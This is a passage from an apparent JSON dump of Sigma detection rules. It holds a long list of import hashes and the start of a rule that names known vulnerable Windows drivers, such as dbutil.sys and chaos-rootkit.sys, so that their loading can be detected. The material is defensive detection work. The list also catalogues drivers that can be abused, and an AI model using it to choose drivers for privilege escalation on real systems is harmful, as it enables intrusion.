'IMPHASH=a8633e68c2ad9f3dc83775d8d5b21c5b'\n            - 'IMPHASH=9d5a58052468c8e07ff3d5bd730e5d00'\n            - 'IMPHASH=69260cce3156aa2dc0540fb78f5fe826'\n            - 'IMPHASH=b1336b0cb67918ed39f1f88c354910d0'\n            - 'IMPHASH=f119bff607049d431d0968fbaf6532f3'\n            - 'IMPHASH=c91146dfe120f6e8fbed2150d9e020ca'\n            - 'IMPHASH=1e6875beefe8571686d3e8530f8c4bfb'\n            - 'IMPHASH=acdf419d1d03923be256205b9c33eec8'\n            - 'IMPHASH=756adaea6a3f9f0cdaff73d1a49ca201'\n            - 'IMPHASH=28dc68bb6d6bf4f6b2db8dd7588b2511'\n            - 'IMPHASH=6e7cd05c0da9f82449a8b3795418ee00'\n            - 'IMPHASH=8c3af6c25ab40c4daefb4f836d12e1c8'\n            - 'IMPHASH=4792bcb395d06f9efb72e8020c4af5e6'\n            - 'IMPHASH=d5bc15465b63888cc8b98ecc63a81517'\n            - 'IMPHASH=7f53340c91c108efedb5b8678c5207b3'\n            - 'IMPHASH=3f4a90b2976641ad2c0164792b24d322'\n            - 'IMPHASH=d221afaadf43ceedb581e665435c56c7'\n            - 'IMPHASH=f212bbc758bb52fc661839b1d194b76e'\n            - 'IMPHASH=e938b727f5a033818337f7ba0584500f'\n            - 'IMPHASH=3ac083b0ee2b752436a8a1532179f032'\n            - 'IMPHASH=2e9ef79ea88178e29516dfa435a58900'\n            - 'IMPHASH=24c3d3be20e794c17844d030be03fd2f'\n            - 'IMPHASH=700a9350ac8b218ab9fc62cf25337ad3'\n            - 'IMPHASH=e586fd1c5af87b43696b9d29b09bf1b1'\n            - 'IMPHASH=2233472cee6457ad207017803048aaff'\n            - 'IMPHASH=f046e37fa7914491dc25a6f7718da341'\n            - 'IMPHASH=683bc425e3d8c21f9473a238a0645a4e'\n            - 'IMPHASH=f08e2ac6ca73cd2a924ed25dc6813638'\n            - 'IMPHASH=e2306e26abfd90a5ce4dad0e266b3905'\n            - 'IMPHASH=10917aa77669c6ae714f074d89be9ab8'\n            - 'IMPHASH=db62897eb9d2098e988f830159c04c82'\n            - 'IMPHASH=51780bba04121d6be13f69de08721445'\n            - 'IMPHASH=29a2e15ac1622a3daf7da5a78f0cef08'\n            - 'IMPHASH=5988ec9f159fefbdf89d893aa634dd92'\n            - 'IMPHASH=05d3de62beab8e88de1dafd3b24a16f6'\n            - 'IMPHASH=88380fdfc880da4da407c38f34fe8a3c'\n            - 'IMPHASH=8a424cd36ae3eab0d11332ce3b982a02'\n            - 'IMPHASH=60a2fba979aaa0d0ccd09c12ca3d9e57'\n            - 'IMPHASH=85f86c7c8ce81a78e84efa545d7edc65'\n            - 'IMPHASH=9523103b30fb194643b97ccc3ab7abb0'\n            - 'IMPHASH=0c2219c9c5eab786fa876f74356eea20'\n            - 'IMPHASH=7abb0911ca4cc4697ee1e9897932d3ac'\n            - 'IMPHASH=c6a0f65ba653ee78255cc9e314abc442'\n            - 'IMPHASH=44e6f2f64092b48f8eb926c36ebd1d56'\n            - 'IMPHASH=13300d56528646611f26704266713952'\n            - 'IMPHASH=095c0cdb9c0421da216371c1f4e8790e'\n            - 'IMPHASH=45f8f347e3fb919f3164a4a3278f1c71'\n            - 'IMPHASH=0e4f5481813eeec4e5dd96e36020135f'\n            - 'IMPHASH=1d05fb30a58133da2e9dbdfcf51b80fd'\n            - 'IMPHASH=2561727ac42d399030b3c46477c428f4'\n            - 'IMPHASH=be69e763a6a858c3e7e1ea6e3af12691'\n            - 'IMPHASH=7fba20994f76fb31b9f5a2b3f0c00055'\n            - 'IMPHASH=1d9cdf46ff335712634c292180c06755'\n            - 'IMPHASH=ad4586d21c9469bf636b5e8660e9d702'\n            - 'IMPHASH=958dd67f866ae27cf716e30a025b266f'\n            - 'IMPHASH=1dd3b83f2b007f862a1d8de4a1d3303f'\n            - 'IMPHASH=b4c562c2c654abd2cc71658646314976'\n            - 'IMPHASH=679eba16ab2d51543b7007708838ef7c'\n            - 'IMPHASH=a1603fe7f02448c6b33687ddb9304c7f'\n            - 'IMPHASH=9e2cf28fe320bbf74972509536569c8e'\n            - 'IMPHASH=f233a65b937c69b447824889fb7425ff'\n            - 'IMPHASH=b3204707f6e489cd5a2484881eaf78ca'\n            - 'IMPHASH=c61a46ffe79d3f7d6307c0d2ae5f391e'\n            - 'IMPHASH=28c5045218461018dbde27212ab0f227'\n            - 'IMPHASH=af34db96db910a3fa7a56f2fac8ed5e1'\n            - 'IMPHASH=e80eeed7225a880bbde0d038a5fe1af4'\n            - 'IMPHASH=62473b41d695f075ad96abc4a408de5b'\n            - 'IMPHASH=56307b5227183c002e4231320a72b961'\n            - 'IMPHASH=dd7c5c0c762169d40ee01280e4ac74fc'\n            - 'IMPHASH=9915439d37f385dbffc72bf835f3ee02'\n            - 'IMPHASH=4199ed50502e00f57d9b66e9305450f5'\n            - 'IMPHASH=71c580daf556775f690f0af3db12506f'\n            - 'IMPHASH=c1ab6741cd29de98a138f2bd639f620a'\n            - 'IMPHASH=32247962aa01af8ad5dca696260a05ab'\n            - 'IMPHASH=1d774a94ad511efe5ebfe70acc6f8c85'\n            - 'IMPHASH=690a0fb27a0c47c785d6bbbfc2e56501'\n            - 'IMPHASH=78727a5fac8bd281903014ee00dcd553'\n            - 'IMPHASH=f5ebade1d3a6d3bde264b0c7f9f639e7'\n            - 'IMPHASH=4343c9c0b78ee21e895f10d929c240d4'\n            - 'IMPHASH=f510a429c6ce5c8d414550518b3823d2'\n            - 'IMPHASH=45acfe4a83f61d872fb904a1f08ef991'\n            - 'IMPHASH=cbf26c6e8cf7e294bda273e7026a2789'\n            - 'IMPHASH=84d83741445d9f5a6717b874fed3d8f3'\n            - 'IMPHASH=0b40636205c64cacfd2e4f407518ad58'\n            - 'IMPHASH=b4627789883457d50964a248104cb4c2'\n            - 'IMPHASH=a7ff164c1ee5113a0a09e66b2cd03544'\n            - 'IMPHASH=a0a13575e37906924a0b79043b4005c6'\n            - 'IMPHASH=955e7b12a8fa06444c68e54026c45de1'\n            - 'IMPHASH=8f52e36711c80bb9d7e30995e0092e83'\n            - 'IMPHASH=05fbe4619edf747787879d9323951439'\n            - 'IMPHASH=865c945f842a3f5f5453fb90d12f6765'\n            - 'IMPHASH=89f925b54b95944513671d79eba5fe07'\n            - 'IMPHASH=f4c5b0399665885a7dd34f7cdbbc586f'\n            - 'IMPHASH=2ece23bdef16ee294bd905c7ba1be589'\n            - 'IMPHASH=e800cd3299d4cda0d9e02255acc3b7dd'\n            - 'IMPHASH=a86fb9a41955bda815ab902fb58baa27'\n            - 'IMPHASH=2f7ea575cf15da16c8f117eee37046d8'\n            - 'IMPHASH=223a76f59831e1a59980b603f81c271d'\n            - 'IMPHASH=c17c0bd619c1e188ffe27bd328dd7d08'\n            - 'IMPHASH=1429d5c551f71d3ce6a7cc54c9348e95'\n            - 'IMPHASH=3552d8a0022e7f3136b667e6d1e402f2'\n            - 'IMPHASH=67d92a28cd2923a923adf7fd958905d8'\n            - 'IMPHASH=3c9af2347198d96c8ab5b189b4e3db37'\n            - 'IMPHASH=f43aa654b4bfb882a0af098ad3f899e9'\n            - 'IMPHASH=518e77c070ae21af7c558962cd1854a3'\n            - 'IMPHASH=8e96d1a56746c6f6f30f1a0963ce2f26'\n            - 'IMPHASH=b19743993dc7f1d48b2a86fe9b9c91e3'\n            - 'IMPHASH=acd1b0130287133223d26c91f27f6899'\n            - 'IMPHASH=82942c060f79cefd3bf1acdf5c207561'\n            - 'IMPHASH=bc5c06a7fa9555f3f34043d828d9b123'\n            - 'IMPHASH=ccdeab2a83fbf2fef2e418cccd133ec1'\n            - 'IMPHASH=2424cf613f90884493009dd6bee95693'\n            - 'IMPHASH=5c77661ac2951da388949d9a834eb694'\n            - 'IMPHASH=2a20cc9578bb34a4bb10b87b49b24982'\n            - 'IMPHASH=3ee1cb6085fbe05e46e2b88493426848'\n            - 'IMPHASH=cb876abd8c6ca8a47d50aec4a520a020'\n            - 'IMPHASH=80ae2342fd6c7f5e1c642918e33dafb1'\n            - 'IMPHASH=aa274f6b4b15691fd725d7044f98bf36'\n            - 'IMPHASH=5e4c9e685f9b7d77c90ff710972bb7dd'\n            - 'IMPHASH=4fb06df8cb54846e42943f0d3ae96e2f'\n            - 'IMPHASH=74cc5d779ee7dbc9f389bab9dcccac50'\n            - 'IMPHASH=0707fe3c02c8d2a4d6219bd0596d76f3'\n            - 'IMPHASH=7863a0f25a0647ed7d52641222bd709a'\n            - 'IMPHASH=75018719e85e67b75e73c57d682dbcbf'\n            - 'IMPHASH=e08b2d7c450761f01ec9ed4ef0ca56a4'\n            - 'IMPHASH=2263350df91a5a4f5e10e68b3b822029'\n            - 'IMPHASH=6f0b9814da4da038669c47e77c2f268f'\n            - 'IMPHASH=9fb64527ca6d4541cc256b1abd1e4101'\n            - 'IMPHASH=27db67ffa112f866f1d34c32226e09cf'\n            - 'IMPHASH=5bb79a6caa12076a6d140085cb53892e'\n            - 'IMPHASH=d169b0949781ca2a6efea5a106266a02'\n            - 'IMPHASH=5a50a9a44f5d36af5df1bde995d22e42'\n            - 'IMPHASH=626c8ecbc636968157d73f18ac315926'\n            - 'IMPHASH=f12ae9073d95c22ed89247253d59f500'\n            - 'IMPHASH=44cbd2ee295f1a35795eb4cd7cdd0864'\n            - 'IMPHASH=840e656bdb2987fa422092ec9d588895'\n            - 'IMPHASH=d57ef6278dcd7049063e8fb6ade9effc'\n            - 'IMPHASH=392aa6863da8d7c14ad7386026e93b58'\n            - 'IMPHASH=5662b51943d85b7ca47a99cac81af985'\n            - 'IMPHASH=8418ac0d7aaa9015794e55ea54733342'\n            - 'IMPHASH=163436e69f8e582bdc1c1e6f735de23b'\n            - 'IMPHASH=24e4c876bb5db0b0e0a4e92f0a3d3a48'\n            - 'IMPHASH=3198fc43051f03c6c71587dbf232f75c'\n            - 'IMPHASH=9321f9c47129fbc728ead2710e22f1a5'\n            - 'IMPHASH=1a0d0d460994cfde55ee908d62330ee0'\n            - 'IMPHASH=82f5b92ccd99d13f4dd6ed6aaf0441bc'\n            - 'IMPHASH=634f3c43b014dc8845b086c9328a678c'\n            - 'IMPHASH=81acb4bb89ef49c4e7f30513b4750e53'\n            - 'IMPHASH=d61d30746681d0fda9bfd9e8af061b2a'\n            - 'IMPHASH=7453e39bd87c63550451ba2fa354dd8e'\n            - 'IMPHASH=bb437241f56020db0fcbf8f8629bdb07'\n            - 'IMPHASH=1e8ee6407390a2d52051bec21c771fdb'\n            - 'IMPHASH=7c24141cdcfc23f5eb0e2b6792d80740'\n            - 'IMPHASH=a7f2c2e8e9d6c90e28819d1a3ab84bc8'\n            - 'IMPHASH=1b0788bb68804273159b8ace9cba7ea3'\n            - 'IMPHASH=9521d8684357766840dbcac2b4cee67d'\n            - 'IMPHASH=b4c2607b2af5376910bf80b561e9a18a'\n            - 'IMPHASH=f138fdbc6c7fbf73e135717c7d7eac27'\n            - 'IMPHASH=82525a4a571f0f8d4e4f42ec6bb3900e'\n            - 'IMPHASH=8bbc742eaed888736a715757f0584fb6'\n            - 'IMPHASH=be527e5f470fbc661f914c81bfc9af38'\n            - 'IMPHASH=ad374977f06fefefbb9c77155f7a0733'\n            - 'IMPHASH=111e6d92e02f02f737654c5b1cfe9f6f'\n            - 'IMPHASH=31907ffcac211e27136b14bb2f442070'\n            - 'IMPHASH=60e068470635cf20cc19b7f8e8cbfc5f'\n            - 'IMPHASH=8a5edbe5251fe141ea0262d5d572178b'\n            - 'IMPHASH=0265c50548889ffd5c2d3a2539885efe'\n            - 'IMPHASH=9376f1c4ab79240cc948b77bf9e8814b'\n            - 'IMPHASH=82b2288ac7f842e42de15c5bc96f1772'\n            - 'IMPHASH=317f02ddc9809d608a9bf63ce24e9550'\n            - 'IMPHASH=65abf5c92cc2239f2dc9d589458569c9'\n            - 'IMPHASH=12fef92a55cb5e1533b89d8e6a5892b2'\n            - 'IMPHASH=fd133033a24971502ff0b2f189215c56'\n            - 'IMPHASH=050d389675730da0d9d75367659cd53b'\n            - 'IMPHASH=c590cbf2d6cbf206a2e47e8ed91dd944'\n            - 'IMPHASH=505e0a016962137ca6169bce64ba2f53'\n            - 'IMPHASH=02a27dc9a48b694b7df4b821eb65178c'\n            - 'IMPHASH=bfe13c695e41d3eee414d3929b1bd523'\n            - 'IMPHASH=5095ddaed3abc22c1510a141d72735cc'\n            - 'IMPHASH=8f96c3ef5dda3fe697d4a4d6326dbe37'\n            - 'IMPHASH=e1ecbd956bd016618b07e7dddcaf6e60'\n            - 'IMPHASH=07a42e80559d960b176c0fc8fd309bfe'\n            - 'IMPHASH=f86759bb4de4320918615dc06e998a39'\n            - 'IMPHASH=c9f08d92efe88afb2545eb82a8870233'\n            - 'IMPHASH=6b867dee14a77d0ada8ccad99b16291e'\n            - 'IMPHASH=744af2b62301859b4ccdffba53551b15'\n            - 'IMPHASH=ec5ee9a38e54ed3d4a6e6545672cb651'\n            - 'IMPHASH=c3c9e6c0c33bad17eb055ec795fc113e'\n            - 'IMPHASH=31a3c2c72c9a565dc4ba75ef26677569'\n            - 'IMPHASH=7bc998aaa9fe4b4fd5e133554f42d913'\n            - 'IMPHASH=bb981f82c2bfc3c22471df92d9d0fb89'\n            - 'IMPHASH=ad34ea17f90a34f6f84a399a96383ada'\n            - 'IMPHASH=30c0ed518c03fa46fa0bfe76f2db0e42'\n            - 'IMPHASH=587191d77c08023e6e95463153e45463'\n            - 'IMPHASH=c83f076c00d2b0a6ba9dc82f56a97631'\n            - 'IMPHASH=cb8db41ab8c06472574e58b9466f4070'\n            - 'IMPHASH=391ffad95759bc4bac2b737d0d0eaa84'\n            - 'IMPHASH=c52384bc825d2414de3195672971339e'\n            - 'IMPHASH=b0e74761cced2dde5173ae05ec562085'\n            - 'IMPHASH=4bd0bd7710a7f71d38f056241c8ce0a7'\n            - 'IMPHASH=ad0cdf3bab32983050527655bce40f96'\n            - 'IMPHASH=e1a5435877b427be967867a25b1d263e'\n            - 'IMPHASH=61b719638eacc2c5ca299805d4819e69'\n            - 'IMPHASH=7687d0eba49315582228ef660f61b471'\n            - 'IMPHASH=e7cbb1ce75bfc69f53855066a936042d'\n            - 'IMPHASH=bc44fdc145156a15d0a803d18877b218'\n            - 'IMPHASH=d5e7fc56a905088dbc79b8e27b98faea'\n            - 'IMPHASH=3702511999371bac8982d01820dd70f2'\n            - 'IMPHASH=d14ea0e632fc8485d77e7eba3c4d4537'\n            - 'IMPHASH=2e7d3b001306473cbff3d0dc11a6fcbc'\n            - 'IMPHASH=e717a2158439123c6fca79b6b2c0ba49'\n            - 'IMPHASH=6736c04d5ff512e5e2eb608414276513'\n            - 'IMPHASH=225e24ee3c4081a16ef32831b70bf8ef'\n            - 'IMPHASH=48028b3b694466c1c0eb1d91ef5c02cb'\n            - 'IMPHASH=37f7c6238c9ce110408e01ae1bc45635'\n            - 'IMPHASH=b95bc1a99081d695b1c0b37b90a4a0be'\n            - 'IMPHASH=78eaf4d62617f6b614d318cc70c6548a'\n            - 'IMPHASH=55db306bc2be3ff71a6b91fd9db051b8'\n            - 'IMPHASH=021fd02a8adad420116496b6f2759960'\n            - 'IMPHASH=b3e26c5e0de2d01597dca208ef27cc38'\n            - 'IMPHASH=67affe6126c1d4a774b2504061c96a2e'\n            - 'IMPHASH=656ad5c2eac95f75d3fe6d5ca59e0d8d'\n            - 'IMPHASH=5ea78a193212fe61ac722f45f0b0eab9'\n            - 'IMPHASH=77ec8b2c372741f12098f084a13a56a8'\n            - 'IMPHASH=f27327907e57c0c2c9fddc68eab2eb7b'\n            - 'IMPHASH=b679ac08daf4b4ce8a58d85a8e0904ac'\n            - 'IMPHASH=f2c2ee1ff03c54f384f4eee8c2533107'\n            - 'IMPHASH=c12f7aec6ebe84a8390c82720adfc237'\n            - 'IMPHASH=0a8eeabf5981efb2116244785cb03900'\n            - 'IMPHASH=7f8c74638fcf297f8216aa5b184f61d6'\n            - 'IMPHASH=d41fa95d4642dc981f10de36f4dc8cd7'\n            - 'IMPHASH=8d616e68080def2200312de80392efa7'\n            - 'IMPHASH=cde9174249f04dad0f79890c976c0792'\n            - 'IMPHASH=858ceae385cdcfcbc7814644564c23e6'\n            - 'IMPHASH=d232ae5bad7ce02f4eece90ef370c7a0'\n            - 'IMPHASH=c7f08aed5725fe6a53a62ebe354ff135'\n            - 'IMPHASH=cc81a908891587ccac8059435eda4c66'\n            - 'IMPHASH=bd4f9a93da2bb4b5f6e90d4f9381661c'\n            - 'IMPHASH=01aa65221a48929f0a34a27c4e3011b1'\n            - 'IMPHASH=409d2ab916237fb129c57aacbb7cb4fe'\n            - 'IMPHASH=65181bc89a1c2b5854548236269846c1'\n            - 'IMPHASH=787e32b3fd816479fb93f9af0b6d0da3'\n            - 'IMPHASH=8e89024d2c0ef0451c12b956a2b55b91'\n            - 'IMPHASH=0cba56fa162378bc4ee09e94a4e2fe33'\n            - 'IMPHASH=b7a0100fe60d7a8263da64820f7d0120'\n            - 'IMPHASH=d16f507665603095c26147a7adcb93b8'\n            - 'IMPHASH=0b663530751cc11f34273fee7921c431'\n            - 'IMPHASH=604b5bd94f1892fd9e9025ef7a2bbe54'\n            - 'IMPHASH=cb8397a3262c80b558aff93ab75b6a7b'\n            - 'IMPHASH=d6c920c10d4d0f92f0ac14c3fefed233'\n            - 'IMPHASH=9fd359d308a1e93106189b4ebd945855'\n            - 'IMPHASH=c94e5ad0f33374535392364a5a193253'\n            - 'IMPHASH=751c6b5c201f8c52f5512350cad88ddc'\n            - 'IMPHASH=eac62dd0c27ed557fa4b641fa4050d04'\n            - 'IMPHASH=506a31d768aec26b297c45b50026c820'\n            - 'IMPHASH=60805da513b95c3d18a93b988bdfb58f'\n            - 'IMPHASH=3aa0ceb8fcd07cf2514d1cb0b9bccf4b'\n            - 'IMPHASH=c1579e4266fbdc47a5abc493a2d9d597'\n            - 'IMPHASH=adfd4c0b031598afecb6f3f585f5f581'\n            - 'IMPHASH=7a286ef4179598007a8afe9e5af95a48'\n            - 'IMPHASH=c7912c850407aa93c979d95c4f593507'\n            - 'IMPHASH=bec5dc89f030df7a96d19483fad4cc0a'\n            - 'IMPHASH=b91054cdc4c8b3169cfe6c157f6d9f07'\n            - 'IMPHASH=d67b7c7501e5261df5e66b3219fa52ee'\n            - 'IMPHASH=b142d772a67c40535c8d8fabb6861748'\n            - 'IMPHASH=1957e33acbc826c69f452ae1d1b89ac9'\n            - 'IMPHASH=7a4a0df0bde1f8da6547a580d5bee7c3'\n            - 'IMPHASH=085a78615099ffefa2df0a31da3058d8'\n            - 'IMPHASH=e804d4ee2c20f3eb1d3c955e38a2fe11'\n            - 'IMPHASH=6f2d756d22c285a46206de3bfde6c79d'\n            - 'IMPHASH=071356ee9d8c7f91cbe8fa3c448286a2'\n            - 'IMPHASH=ebf30b4cd57a4f4548a03eab0f6c418c'\n            - 'IMPHASH=08ab07a2bc35aea02cd6d1efbb954cb3'\n            - 'IMPHASH=cb15f8046e159c17b0510738fa18f758'\n            - 'IMPHASH=07a513d1599c93bd34f01323b1ef7430'\n            - 'IMPHASH=2430f988dcdc3828f6079e1e2cc71dc8'\n            - 'IMPHASH=8b41eacbfbe5f5348579e27d30767e74'\n            - 'IMPHASH=afee876e89b51e2cc7c91353fb588fe6'\n            - 'IMPHASH=e11e41c95c1872ac3ebbd7768b16cf9e'\n            - 'IMPHASH=e9077c03c44a511c2c8eaf5bad9ab90b'\n            - 'IMPHASH=d6d76f43ccc3872b879b0df583364c78'\n            - 'IMPHASH=62dbb90b4be9282d52aff9ae1a101d6b'\n            - 'IMPHASH=3ec1e7e215efad2711248558465da9ad'\n            - 'IMPHASH=96f270be3f73ec3fc2f2237fe84efca0'\n            - 'IMPHASH=9ad5f7496f8c918d6c0536751d3accae'\n            - 'IMPHASH=b1ed268dfdf4f39960971eb5822a4755'\n            - 'IMPHASH=4c0161f638d5acafe23fcee3c5e86f15'\n            - 'IMPHASH=9928d53dbe860aba1b7c891831680629'\n            - 'IMPHASH=d122c1eaa50839be14c31876d0d4e0be'\n            - 'IMPHASH=8f4588156ea7d9af8e4c162ce4c3ff23'\n            - 'IMPHASH=abdaca21ab5c831000b0aa4b8f357716'\n            - 'IMPHASH=0555907292d07d9f78205416eb1924d3'\n            - 'IMPHASH=832f0fb3579a07b1c4bec82b4478306b'\n            - 'IMPHASH=340e874a1ca966e45fc2a314ef228cce'\n            - 'IMPHASH=b35d1d3faa6c97b106b343823d5df867'\n            - 'IMPHASH=7e1327419d10a7eeece5579526f75d9f'\n            - 'IMPHASH=084b99aebda8a13e4f774a2ced272e85'\n            - 'IMPHASH=81ba5280406320ce6f03a9817d7d6035'\n            - 'IMPHASH=e4f1a9234e4ea105321909d4c0e597ae'\n            - 'IMPHASH=68a12eb3f32f7e193bd0d722ea6be4ab'\n            - 'IMPHASH=c3fd2e688276a184b2528ee590054e5a'\n            - 'IMPHASH=531d2392dbdd314fb1d9318fe9e5c4d2'\n            - 'IMPHASH=29a1da8841f5363423dcba1a9773809a'\n            - 'IMPHASH=9fc4a96d982ebfd6b9d87c0f3ebef681'\n            - 'IMPHASH=304c4fcf70cfc8299a3b6eed8e7bbb31'\n            - 'IMPHASH=3415f704b3149ea9a3d3a54036b208dd'\n            - 'IMPHASH=7cf815757705e26b809574488ed56d0e'\n            - 'IMPHASH=28d780857f0f6616f938aca3a38b5072'\n            - 'IMPHASH=235102691b04f562ae8aa7ece38d8bc9'\n            - 'IMPHASH=262d8fbbf1f514399bb3f230cddc12af'\n            - 'IMPHASH=0f3ddbe229201f6fa9a3dbbaf842a556'\n            - 'IMPHASH=bd093a7d5ba5632ee52f3466a688ee55'\n            - 'IMPHASH=a9e22f5e8f4965960716d94ba7639c9f'\n            - 'IMPHASH=528ac7a1e034801d1f20238971c6ec19'\n            - 'IMPHASH=45bfe170e0cd654bc1e2ae3fca3ac3f4'\n            - 'IMPHASH=7c8c655791b5c853e45aa174e5cc1333'\n            - 'IMPHASH=a53b095a8d7366075d445892070cde51'\n            - 'IMPHASH=f079f8637a1d4fe2fb93af2a267b68ef'\n            - 'IMPHASH=0ebd5902a82ddfef8ed96678c1573a7b'\n            - 'IMPHASH=9a970527986cd03e5a25d18b372624a1'\n            - 'IMPHASH=87fde0c3f8e7dff7ab0d718d6b1252c8'\n            - 'IMPHASH=959dce366573a7aae10b74a08931722a'\n            - 'IMPHASH=fce118020e70919e5c8c629687f89e56'\n            - 'IMPHASH=86682585c620fa85096a7bedaf990cd1'\n            - 'IMPHASH=5f9cf5b0511f3c1129b467d273b921f2'\n            - 'IMPHASH=543f80399f79401471523d335ea61642'\n            - 'IMPHASH=3ca448454c33a5c72ad5e774de47930a'\n            - 'IMPHASH=51ecd9b363fde1f003f4b4f20c874b1b'\n            - 'IMPHASH=1f2627fc453dc35031a9502372bd3549'\n            - 'IMPHASH=2cf48a541dc193e91bb2a831adcf278e'\n            - 'IMPHASH=805e4a267f9495e7c0c430d92b78f8bd'\n            - 'IMPHASH=92caaf6ebb43bbe61f3da8526172f776'\n            - 'IMPHASH=421730c2b3fa3a7d78c2eda3da1be6a8'\n            - 'IMPHASH=aa54fa0523f677e56d6d8199e5e18732'\n            - 'IMPHASH=8ee2435c62b02fe0372cde028be489cb'\n            - 'IMPHASH=50b6a9c4df6d0c9f517c804ad1307d7c'\n            - 'IMPHASH=037b9d19995faadf69a2ce134473e346'\n            - 'IMPHASH=2c19472843b56c67efb80d8c447f3cfe'\n            - 'IMPHASH=a74f61fdcea718cb9579907b2caf54ab'\n            - 'IMPHASH=84d45ee8df6f63b5af419d89003a97bc'\n            - 'IMPHASH=69dbb4c8bbe4d8c2e1493f82170b93c4'\n            - 'IMPHASH=6903b92e7760c5d7f7c181b64eb13176'\n            - 'IMPHASH=d6f977640d4810a784d152e4d3c63a6b'\n            - 'IMPHASH=473c3773ca11aa7371dbf350919c5724'\n            - 'IMPHASH=87842ffa59724bda8389394bcaeb5d73'\n            - 'IMPHASH=18502b56d9ea5dea7f9d31ef85db31d5'\n            - 'IMPHASH=b6f67458e30912358144df4adf5264fd'\n            - 'IMPHASH=a49a51d7f2ae972483961eb64d17888e'\n            - 'IMPHASH=81e2eb25e24938b90806de865630a2b2'\n            - 'IMPHASH=96861132665e8d66c0a91e6c02cc6639'\n            - 'IMPHASH=69163e5596280d3319375c9bcd4b5da1'\n            - 'IMPHASH=4946030efb34ab167180563899d5eb27'\n            - 'IMPHASH=4c304943af1b07b15a5efa80f17d9b89'\n            - 'IMPHASH=821d74031d3f625bcbd0df08b70f1e77'\n            - 'IMPHASH=1bef18e9dda6f1e7bbf7eb76e9ccf16b'\n            - 'IMPHASH=21f58b1f2de6ad0e9c019da7a4e7317b'\n            - 'IMPHASH=91387ac37086b9b519f945b58095f38d'\n            - 'IMPHASH=dcd41632f0ad9683e5c9c7cc083f78f7'\n            - 'IMPHASH=ced7ea67fdf3d89a48849e0062278f7d'\n            - 'IMPHASH=5713a0c2b363c49706fa0e60151511a8'\n            - 'IMPHASH=089e8a8f2bb007852c63b64e66430293'\n            - 'IMPHASH=383be1d728b0be96be1b810a131705ee'\n            - 'IMPHASH=3d42ff70269b824dd9d4a8cb905669f9'\n            - 'IMPHASH=363922cc73591e60f2af113182414230'\n            - 'IMPHASH=fa084cdc36f03f1aeddaa3450e2781b1'\n            - 'IMPHASH=3c61f9a38aaa7650fcd33b46e794d1bb'\n            - 'IMPHASH=42e3f2ffa29901e572f2df03cb872159'\n            - 'IMPHASH=4c5fc4519f1417f0630c3343aab7c9d2'\n            - 'IMPHASH=d5d40497d82daf7e44255ede810ce7a6'\n            - 'IMPHASH=91ee149529956a79a91eeb8c48f00b3d'\n            - 'IMPHASH=a387f215b4964a3ca2e3c92f235a6d1b'\n            - 'IMPHASH=ca6e77f472ebd5b2ade876e7c773bb57'\n            - 'IMPHASH=67bace81ce26ddf73732dd75cbd0c0f2'\n            - 'IMPHASH=18b8de84bd7aa83fec79d2c6aaf0a4f5'\n            - 'IMPHASH=519cf5394541bf5e2869edeec81521e1'\n            - 'IMPHASH=cae90f82e91b9a60af9a0e36c1f73be4'\n            - 'IMPHASH=643f4d79f35dddc9bb5cc04a0f0c18d3'\n            - 'IMPHASH=6b7d4c6283b9b951b7b2f47a0c5be8c7'\n            - 'IMPHASH=b4c857bd3a7b1d8125c0f62aec45401e'\n            - 'IMPHASH=49a12b06131d938e9dc40c693b88ba7f'\n            - 'IMPHASH=f74aa24adc713dbb957ccb18f3c16a71'\n            - 'IMPHASH=6faad89adbfc9d5448bb1bd12e7714cd'\n            - 'IMPHASH=5759d90322a7311eaccf4f0ab2c2a7c4'\n            - 'IMPHASH=8b6c1a09e11200591663b880a94a8d18'\n            - 'IMPHASH=eade2a2576f329e4971bf5044ab24ac7'\n            - 'IMPHASH=8b47d6faba90b5c89e27f7119c987e1a'\n            - 'IMPHASH=4433528b0f664177546dd3e229f0daa5'\n            - 'IMPHASH=c0f234205c50cc713673353c9653eea1'\n            - 'IMPHASH=b4b90c1b054ebe273bff4b2fd6927990'\n            - 'IMPHASH=f2dc136141066311fddef65f7f417c44'\n            - 'IMPHASH=12a08688ec92616a8b639d85cc13a3ed'\n            - 'IMPHASH=296afaa5ea70bbd17135afcd04758148'\n            - 'IMPHASH=8232d2f79ce126e84cc044543ad82790'\n            - 'IMPHASH=e10e743d152cf62f219a7e9192fb533d'\n            - 'IMPHASH=e5af2438da6df2aa9750aa632c80cfa4'\n            - 'IMPHASH=3a4e0bc46866ca54459753f62c879b62'\n            - 'IMPHASH=10cb3185e13390f8931a50a131448cdf'\n            - 'IMPHASH=4fb27d2712ef4afdb67e0921d64a5f1e'\n            - 'IMPHASH=a96a02cf5f7896a9a9f045d1986bd83c'\n            - 'IMPHASH=fd894d394a8ca9abd74f7210ed931682'\n            - 'IMPHASH=ca07de87d444c1d2d10e16e9dcc2dc19'\n            - 'IMPHASH=1aa10b05dee9268d7ce87f5f56ea9ded'\n            - 'IMPHASH=485f7e86663d49c68c8b5f705d310f50'\n            - 'IMPHASH=5899e93373114ca9e458e906675132b7'\n            - 'IMPHASH=be2d638c3933fc3f5a96e539f9910c5f'\n            - 'IMPHASH=fbfa302bf7eb5d615d0968541ee49ce4'\n            - 'IMPHASH=f9b9487f25a2c1e08c02f391387c5323'\n            - 'IMPHASH=ef102e058f6b88af0d66d26236257706'\n            - 'IMPHASH=0f371a913e9fa3ba3a923718e489debb'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml",
    "content": "title: Vulnerable Driver Load By Name\nid: 72cd00d6-490c-4650-86ff-1d11f491daa1\nstatus: test\ndescription: Detects the load of known vulnerable drivers via the file name of the drivers.\nreferences:\n    - https://loldrivers.io/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-03\nmodified: 2023-12-02\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\n    - attack.t1068\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\panmonfltx64.sys'\n            - '\\dbutil.sys'\n            - '\\fairplaykd.sys'\n            - '\\nvaudio.sys'\n            - '\\superbmc.sys'\n            - '\\bsmi.sys'\n            - '\\smarteio64.sys'\n            - '\\bwrsh.sys'\n            - '\\agent64.sys'\n            - '\\asmmap64.sys'\n            - '\\dellbios.sys'\n            - '\\chaos-rootkit.sys'\n            - '\\wcpu.sys'\n            - '\\dh_kernel.sys'\n            - '\\sbiosio64.sys'\n            - '\\bw.sys'\n            - '\\asrdrv102.sys'\n            - '\\nt6.sys'\n            - '\\mhyprot3.sys'\n            - '\\winio64c.sys'\n            - 